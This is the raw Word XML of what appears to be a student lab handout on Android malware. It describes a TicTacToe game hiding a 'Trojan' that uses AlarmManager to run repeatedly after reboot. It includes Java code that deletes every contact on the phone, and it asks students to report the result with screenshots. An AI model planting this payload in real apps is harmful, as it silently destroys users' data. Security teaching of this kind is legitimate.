            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://www.open-open.com/lib/view/open1350291466977.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRPr="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">AlarmManager sets up Alarm Service, which is something that periodically “wakes up” the phone when it needs to do something after it’s gone into sleep mode. Also call PendingIntent, which is an intent that works off the alarm when it fires to call a broadcast receiver. Finally, call </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>setInexactRepeating, which fires the intent periodically until the AlarmManager service is killed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRPr="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>he RunTrojan class captures the repeating intent to fire our Trojan class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, and deletes the contact list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRPr="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>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D1238F" w:rsidRPr="00F26D6B" w:rsidTr="000A6ABB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00D1238F" w:rsidRPr="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1238F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ContentResolver contentResolver = getContentResolver();</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Cursor cursor = contentResolver.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);</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while (cursor.moveToNext()) {</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String lookupKey = cursor.getString(cursor.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));</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Uri uri = Uri.withAppendedPath(ContactsContract.Contacts.CONTENT_LOOKUP_URI, lookupKey);</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contentResolver.delete(uri, null, null);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D1238F" w:rsidRPr="00F26D6B" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1238F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00781488" w:rsidP="00D1238F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">The user runs the TicTacToe game once. </w:t>
      </w:r>
      <w:r w:rsidR="00D1238F" w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">After restarting the phone, the contacts are still there if you go to them immediately, but the service always waits a couple minutes before it strikes. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D1238F" w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> few minutes after restarting phone, if you’re watching the contacts page on the phone they will all vanish instantly. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00D1238F" w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>o make sure the attack keeps happening, set up a couple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> more</w:t>
      </w:r>
      <w:r w:rsidR="00D1238F" w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> contacts. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D1238F" w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fter a few more minutes they disappear again</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4C74" w:rsidRDefault="00CC4C74" w:rsidP="00D1238F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC4C74" w:rsidRDefault="00CC4C74" w:rsidP="00CC4C74">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F3424" w:rsidRPr="00CC4C74" w:rsidRDefault="00781488" w:rsidP="00D1238F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Please include step-by-step screenshots in the lab report, with your name in English as the message text.</w:t>
      </w:r>
      <w:r w:rsidR="001F3424">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001F3424" w:rsidRPr="00CC4C74" w:rsidSect="00D1238F">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A7" w:rsidRDefault="001D01A7" w:rsidP="00105669">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001D01A7" w:rsidRDefault="001D01A7"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A7" w:rsidRDefault="001D01A7" w:rsidP="00105669">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001D01A7" w:rsidRDefault="001D01A7"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A644D7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56D6AEDA"/>
    <w:lvl w:ilvl="0" w:tplc="FD0A0C68">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsia="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4565DD6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B866618"/>
    <w:lvl w:ilvl="0" w:tplc="2752F87A">
      <w:start w:val="5"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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4"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="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B8"/>
    <w:rsid w:val="00000FFF"/>
    <w:rsid w:val="00001481"/>
    <w:rsid w:val="000019C6"/>
    <w:rsid w:val="00003422"/>
    <w:rsid w:val="000065D0"/>
    <w:rsid w:val="00007D0F"/>
    <w:rsid w:val="00007D55"/>
    <w:rsid w:val="00007E53"/>
    <w:rsid w:val="000108AB"/>
    <w:rsid w:val="00010FE6"/>
    <w:rsid w:val="00012F00"/>
    <w:rsid w:val="0001442D"/>
    <w:rsid w:val="0001582A"/>
    <w:rsid w:val="00016B4A"/>
    <w:rsid w:val="00016BE3"/>
    <w:rsid w:val="0001771F"/>
    <w:rsid w:val="000211FA"/>
    <w:rsid w:val="00026DB7"/>
    <w:rsid w:val="00030B7D"/>
    <w:rsid w:val="0003126C"/>
    <w:rsid w:val="00032FC9"/>
    <w:rsid w:val="0003593B"/>
    <w:rsid w:val="00035CB9"/>
    <w:rsid w:val="00036A1D"/>
    <w:rsid w:val="00040543"/>
    <w:rsid w:val="000413B1"/>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49E2"/>
    <w:rsid w:val="0007613C"/>
    <w:rsid w:val="0007635B"/>
    <w:rsid w:val="0008523A"/>
    <w:rsid w:val="00086B2C"/>
    <w:rsid w:val="00087E2A"/>
    <w:rsid w:val="000901EE"/>
    <w:rsid w:val="00093811"/>
    <w:rsid w:val="00096241"/>
    <w:rsid w:val="00097B75"/>
    <w:rsid w:val="000A0730"/>
    <w:rsid w:val="000A0D0A"/>
    <w:rsid w:val="000A18F8"/>
    <w:rsid w:val="000A2D4C"/>
    <w:rsid w:val="000A383C"/>
    <w:rsid w:val="000A5809"/>
    <w:rsid w:val="000A682E"/>
    <w:rsid w:val="000A7BC6"/>
    <w:rsid w:val="000B19A1"/>
    <w:rsid w:val="000B1BCE"/>
    <w:rsid w:val="000B2E78"/>
    <w:rsid w:val="000B3060"/>
    <w:rsid w:val="000B3B40"/>
    <w:rsid w:val="000B5C82"/>
    <w:rsid w:val="000C26AF"/>
    <w:rsid w:val="000C5993"/>
    <w:rsid w:val="000C5A0A"/>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5669"/>
    <w:rsid w:val="00106E21"/>
    <w:rsid w:val="00110A35"/>
    <w:rsid w:val="00110D48"/>
    <w:rsid w:val="0011115D"/>
    <w:rsid w:val="0011244E"/>
    <w:rsid w:val="00112683"/>
    <w:rsid w:val="0011348B"/>
    <w:rsid w:val="00113508"/>
    <w:rsid w:val="001136A1"/>
    <w:rsid w:val="00117959"/>
    <w:rsid w:val="00120E8D"/>
    <w:rsid w:val="001261C1"/>
    <w:rsid w:val="00127B4C"/>
    <w:rsid w:val="001304CD"/>
    <w:rsid w:val="00130D21"/>
    <w:rsid w:val="00132F26"/>
    <w:rsid w:val="0013523F"/>
    <w:rsid w:val="00135B75"/>
    <w:rsid w:val="00135EAE"/>
    <w:rsid w:val="00137530"/>
    <w:rsid w:val="001415C2"/>
    <w:rsid w:val="0014349D"/>
    <w:rsid w:val="00143BB9"/>
    <w:rsid w:val="00146126"/>
    <w:rsid w:val="00147ADF"/>
    <w:rsid w:val="00147B74"/>
    <w:rsid w:val="00154046"/>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32A1"/>
    <w:rsid w:val="001B25A4"/>
    <w:rsid w:val="001B2FC9"/>
    <w:rsid w:val="001B364E"/>
    <w:rsid w:val="001B3FC0"/>
    <w:rsid w:val="001B43CB"/>
    <w:rsid w:val="001B45CF"/>
    <w:rsid w:val="001B64B5"/>
    <w:rsid w:val="001C29B6"/>
    <w:rsid w:val="001C41E4"/>
    <w:rsid w:val="001C5C63"/>
    <w:rsid w:val="001C6D3F"/>
    <w:rsid w:val="001C71C5"/>
    <w:rsid w:val="001C75C5"/>
    <w:rsid w:val="001C7697"/>
    <w:rsid w:val="001C7E19"/>
    <w:rsid w:val="001D01A7"/>
    <w:rsid w:val="001D1792"/>
    <w:rsid w:val="001D2740"/>
    <w:rsid w:val="001D2F57"/>
    <w:rsid w:val="001D3A9F"/>
    <w:rsid w:val="001D5E1B"/>
    <w:rsid w:val="001D5F99"/>
    <w:rsid w:val="001D72C2"/>
    <w:rsid w:val="001E4B45"/>
    <w:rsid w:val="001E545B"/>
    <w:rsid w:val="001E660A"/>
    <w:rsid w:val="001F206E"/>
    <w:rsid w:val="001F3424"/>
    <w:rsid w:val="001F3CBD"/>
    <w:rsid w:val="001F3F21"/>
    <w:rsid w:val="001F49AB"/>
    <w:rsid w:val="001F5538"/>
    <w:rsid w:val="001F6586"/>
    <w:rsid w:val="001F71E6"/>
    <w:rsid w:val="001F7872"/>
    <w:rsid w:val="0020050D"/>
    <w:rsid w:val="00202521"/>
    <w:rsid w:val="0020641B"/>
    <w:rsid w:val="00212854"/>
    <w:rsid w:val="002129BE"/>
    <w:rsid w:val="0021496C"/>
    <w:rsid w:val="00215A1D"/>
    <w:rsid w:val="00215DA8"/>
    <w:rsid w:val="00217415"/>
    <w:rsid w:val="002227E2"/>
    <w:rsid w:val="00222949"/>
    <w:rsid w:val="00222A42"/>
    <w:rsid w:val="00222B1A"/>
    <w:rsid w:val="00223751"/>
    <w:rsid w:val="0022445E"/>
    <w:rsid w:val="002254A9"/>
    <w:rsid w:val="00225983"/>
    <w:rsid w:val="002300D5"/>
    <w:rsid w:val="00230E99"/>
    <w:rsid w:val="0023465E"/>
    <w:rsid w:val="00234BCE"/>
    <w:rsid w:val="00235087"/>
    <w:rsid w:val="0024279B"/>
    <w:rsid w:val="0024289A"/>
    <w:rsid w:val="00244844"/>
    <w:rsid w:val="00247190"/>
    <w:rsid w:val="00250B92"/>
    <w:rsid w:val="002533A9"/>
    <w:rsid w:val="00255D19"/>
    <w:rsid w:val="002560AC"/>
    <w:rsid w:val="00256243"/>
    <w:rsid w:val="00261E8C"/>
    <w:rsid w:val="00262C4A"/>
    <w:rsid w:val="00265973"/>
    <w:rsid w:val="002727C4"/>
    <w:rsid w:val="00272CD0"/>
    <w:rsid w:val="002745A6"/>
    <w:rsid w:val="00290682"/>
    <w:rsid w:val="00291F2A"/>
    <w:rsid w:val="00292F0C"/>
    <w:rsid w:val="0029455E"/>
    <w:rsid w:val="00294686"/>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4203"/>
    <w:rsid w:val="002D4F19"/>
    <w:rsid w:val="002D5F87"/>
    <w:rsid w:val="002D5FD9"/>
    <w:rsid w:val="002E0062"/>
    <w:rsid w:val="002E1BDD"/>
    <w:rsid w:val="002E369A"/>
    <w:rsid w:val="002E3704"/>
    <w:rsid w:val="002E40AC"/>
    <w:rsid w:val="002E517A"/>
    <w:rsid w:val="002F0448"/>
    <w:rsid w:val="002F0A8B"/>
    <w:rsid w:val="002F2886"/>
    <w:rsid w:val="002F3D5C"/>
    <w:rsid w:val="00302A1D"/>
    <w:rsid w:val="00303B6D"/>
    <w:rsid w:val="00304023"/>
    <w:rsid w:val="00304796"/>
    <w:rsid w:val="00304922"/>
    <w:rsid w:val="0030777E"/>
    <w:rsid w:val="00310488"/>
    <w:rsid w:val="0031076F"/>
    <w:rsid w:val="00311599"/>
    <w:rsid w:val="003126B9"/>
    <w:rsid w:val="0031281B"/>
    <w:rsid w:val="00312844"/>
    <w:rsid w:val="00312B20"/>
    <w:rsid w:val="0031588E"/>
    <w:rsid w:val="00321459"/>
    <w:rsid w:val="00323809"/>
    <w:rsid w:val="00324CB9"/>
    <w:rsid w:val="00327666"/>
    <w:rsid w:val="00330B48"/>
    <w:rsid w:val="003325C4"/>
    <w:rsid w:val="00332BB3"/>
    <w:rsid w:val="00333D13"/>
    <w:rsid w:val="00335A52"/>
    <w:rsid w:val="00335B35"/>
    <w:rsid w:val="003366A7"/>
    <w:rsid w:val="003367C1"/>
    <w:rsid w:val="00336A30"/>
    <w:rsid w:val="003400D5"/>
    <w:rsid w:val="00343049"/>
    <w:rsid w:val="00344E8E"/>
    <w:rsid w:val="00346254"/>
    <w:rsid w:val="0034633D"/>
    <w:rsid w:val="00350E98"/>
    <w:rsid w:val="00352199"/>
    <w:rsid w:val="00361AD8"/>
    <w:rsid w:val="003655AA"/>
    <w:rsid w:val="003662A1"/>
    <w:rsid w:val="00366FD4"/>
    <w:rsid w:val="003710F9"/>
    <w:rsid w:val="00372CA4"/>
    <w:rsid w:val="00374B42"/>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A1099"/>
    <w:rsid w:val="003A1330"/>
    <w:rsid w:val="003A24C4"/>
    <w:rsid w:val="003A2B34"/>
    <w:rsid w:val="003A7319"/>
    <w:rsid w:val="003B3493"/>
    <w:rsid w:val="003B4539"/>
    <w:rsid w:val="003B588D"/>
    <w:rsid w:val="003B60FB"/>
    <w:rsid w:val="003B6AFD"/>
    <w:rsid w:val="003B7F1F"/>
    <w:rsid w:val="003C2539"/>
    <w:rsid w:val="003C37E8"/>
    <w:rsid w:val="003C4197"/>
    <w:rsid w:val="003C68AB"/>
    <w:rsid w:val="003D0A01"/>
    <w:rsid w:val="003D405F"/>
    <w:rsid w:val="003D76BF"/>
    <w:rsid w:val="003E3F89"/>
    <w:rsid w:val="003E7119"/>
    <w:rsid w:val="003E7A92"/>
    <w:rsid w:val="003F07E9"/>
    <w:rsid w:val="00400325"/>
    <w:rsid w:val="004014A2"/>
    <w:rsid w:val="0040395F"/>
    <w:rsid w:val="00404CED"/>
    <w:rsid w:val="00405A62"/>
    <w:rsid w:val="004060E0"/>
    <w:rsid w:val="00411995"/>
    <w:rsid w:val="00411D02"/>
    <w:rsid w:val="00412285"/>
    <w:rsid w:val="004123A8"/>
    <w:rsid w:val="0041542E"/>
    <w:rsid w:val="00420C09"/>
    <w:rsid w:val="00425241"/>
    <w:rsid w:val="0042628B"/>
    <w:rsid w:val="00426515"/>
    <w:rsid w:val="004273A6"/>
    <w:rsid w:val="00427F15"/>
    <w:rsid w:val="004317CA"/>
    <w:rsid w:val="00431FBC"/>
    <w:rsid w:val="00432A00"/>
    <w:rsid w:val="00432A61"/>
    <w:rsid w:val="00434B6D"/>
    <w:rsid w:val="00441D82"/>
    <w:rsid w:val="00444260"/>
    <w:rsid w:val="00444892"/>
    <w:rsid w:val="00446DDC"/>
    <w:rsid w:val="00447E9D"/>
    <w:rsid w:val="00452019"/>
    <w:rsid w:val="00454ACA"/>
    <w:rsid w:val="0045531E"/>
    <w:rsid w:val="00456A65"/>
    <w:rsid w:val="004601A9"/>
    <w:rsid w:val="00460DB7"/>
    <w:rsid w:val="004620CD"/>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573"/>
    <w:rsid w:val="00481FEE"/>
    <w:rsid w:val="00483C97"/>
    <w:rsid w:val="00484CE8"/>
    <w:rsid w:val="00485776"/>
    <w:rsid w:val="00485C44"/>
    <w:rsid w:val="0048696F"/>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484"/>
    <w:rsid w:val="004C552A"/>
    <w:rsid w:val="004D120B"/>
    <w:rsid w:val="004D1E02"/>
    <w:rsid w:val="004D1F31"/>
    <w:rsid w:val="004D48C9"/>
    <w:rsid w:val="004D7B99"/>
    <w:rsid w:val="004E1A4B"/>
    <w:rsid w:val="004E3961"/>
    <w:rsid w:val="004E51F6"/>
    <w:rsid w:val="004E66A3"/>
    <w:rsid w:val="004E6829"/>
    <w:rsid w:val="004F183E"/>
    <w:rsid w:val="004F285E"/>
    <w:rsid w:val="004F55F9"/>
    <w:rsid w:val="004F699D"/>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32239"/>
    <w:rsid w:val="005343A3"/>
    <w:rsid w:val="00534792"/>
    <w:rsid w:val="00535A0B"/>
    <w:rsid w:val="00537C5D"/>
    <w:rsid w:val="00540C9B"/>
    <w:rsid w:val="00542856"/>
    <w:rsid w:val="005461AD"/>
    <w:rsid w:val="00547187"/>
    <w:rsid w:val="005472E6"/>
    <w:rsid w:val="0054754D"/>
    <w:rsid w:val="005476E6"/>
    <w:rsid w:val="00550535"/>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8135F"/>
    <w:rsid w:val="00581E28"/>
    <w:rsid w:val="0059037B"/>
    <w:rsid w:val="005946EC"/>
    <w:rsid w:val="005948F6"/>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7234"/>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F217C"/>
    <w:rsid w:val="005F4F4B"/>
    <w:rsid w:val="005F779F"/>
    <w:rsid w:val="0060190A"/>
    <w:rsid w:val="0060212A"/>
    <w:rsid w:val="00605269"/>
    <w:rsid w:val="00610EF1"/>
    <w:rsid w:val="00611377"/>
    <w:rsid w:val="0061228D"/>
    <w:rsid w:val="006133AD"/>
    <w:rsid w:val="00614980"/>
    <w:rsid w:val="00615DDC"/>
    <w:rsid w:val="00615E06"/>
    <w:rsid w:val="00616280"/>
    <w:rsid w:val="00620575"/>
    <w:rsid w:val="00621A51"/>
    <w:rsid w:val="006237C6"/>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52814"/>
    <w:rsid w:val="00652B4C"/>
    <w:rsid w:val="006534B8"/>
    <w:rsid w:val="00653995"/>
    <w:rsid w:val="0065557F"/>
    <w:rsid w:val="00656407"/>
    <w:rsid w:val="006565FC"/>
    <w:rsid w:val="00661CA7"/>
    <w:rsid w:val="00662501"/>
    <w:rsid w:val="006646D3"/>
    <w:rsid w:val="00664A8D"/>
    <w:rsid w:val="006658BC"/>
    <w:rsid w:val="006658EE"/>
    <w:rsid w:val="00665D76"/>
    <w:rsid w:val="00673CAA"/>
    <w:rsid w:val="006746E8"/>
    <w:rsid w:val="00674DD2"/>
    <w:rsid w:val="00677F19"/>
    <w:rsid w:val="00680CE6"/>
    <w:rsid w:val="006846B1"/>
    <w:rsid w:val="00684BAE"/>
    <w:rsid w:val="00687154"/>
    <w:rsid w:val="00692366"/>
    <w:rsid w:val="00695B88"/>
    <w:rsid w:val="0069688E"/>
    <w:rsid w:val="0069694E"/>
    <w:rsid w:val="00697811"/>
    <w:rsid w:val="006A00AF"/>
    <w:rsid w:val="006A1BC1"/>
    <w:rsid w:val="006A3106"/>
    <w:rsid w:val="006A3375"/>
    <w:rsid w:val="006A5DD3"/>
    <w:rsid w:val="006B271B"/>
    <w:rsid w:val="006B335D"/>
    <w:rsid w:val="006B354C"/>
    <w:rsid w:val="006B448C"/>
    <w:rsid w:val="006B6773"/>
    <w:rsid w:val="006C0AE6"/>
    <w:rsid w:val="006C5C61"/>
    <w:rsid w:val="006C6881"/>
    <w:rsid w:val="006C75AD"/>
    <w:rsid w:val="006C7BE7"/>
    <w:rsid w:val="006D17EA"/>
    <w:rsid w:val="006D4FAD"/>
    <w:rsid w:val="006D668B"/>
    <w:rsid w:val="006D67AF"/>
    <w:rsid w:val="006D789A"/>
    <w:rsid w:val="006D793C"/>
    <w:rsid w:val="006D7D30"/>
    <w:rsid w:val="006E0610"/>
    <w:rsid w:val="006E0DC3"/>
    <w:rsid w:val="006E10AF"/>
    <w:rsid w:val="006E1756"/>
    <w:rsid w:val="006E2190"/>
    <w:rsid w:val="006E2292"/>
    <w:rsid w:val="006E7E02"/>
    <w:rsid w:val="006F184A"/>
    <w:rsid w:val="006F63A9"/>
    <w:rsid w:val="006F6DBE"/>
    <w:rsid w:val="00700380"/>
    <w:rsid w:val="00701877"/>
    <w:rsid w:val="00703F95"/>
    <w:rsid w:val="00705406"/>
    <w:rsid w:val="00707B09"/>
    <w:rsid w:val="00707D8E"/>
    <w:rsid w:val="007104FB"/>
    <w:rsid w:val="00710A4C"/>
    <w:rsid w:val="0071339C"/>
    <w:rsid w:val="00714368"/>
    <w:rsid w:val="007152A3"/>
    <w:rsid w:val="00717EB6"/>
    <w:rsid w:val="00723156"/>
    <w:rsid w:val="00723322"/>
    <w:rsid w:val="00725EAC"/>
    <w:rsid w:val="00731AC7"/>
    <w:rsid w:val="007339A2"/>
    <w:rsid w:val="00733D9C"/>
    <w:rsid w:val="00734E06"/>
    <w:rsid w:val="00734EEF"/>
    <w:rsid w:val="007356D1"/>
    <w:rsid w:val="007408C3"/>
    <w:rsid w:val="007431A0"/>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5023"/>
    <w:rsid w:val="00771264"/>
    <w:rsid w:val="00771598"/>
    <w:rsid w:val="007740A2"/>
    <w:rsid w:val="00774397"/>
    <w:rsid w:val="007744EC"/>
    <w:rsid w:val="00774937"/>
    <w:rsid w:val="00777B9B"/>
    <w:rsid w:val="00777D20"/>
    <w:rsid w:val="00780DC3"/>
    <w:rsid w:val="00781488"/>
    <w:rsid w:val="007819A9"/>
    <w:rsid w:val="00782371"/>
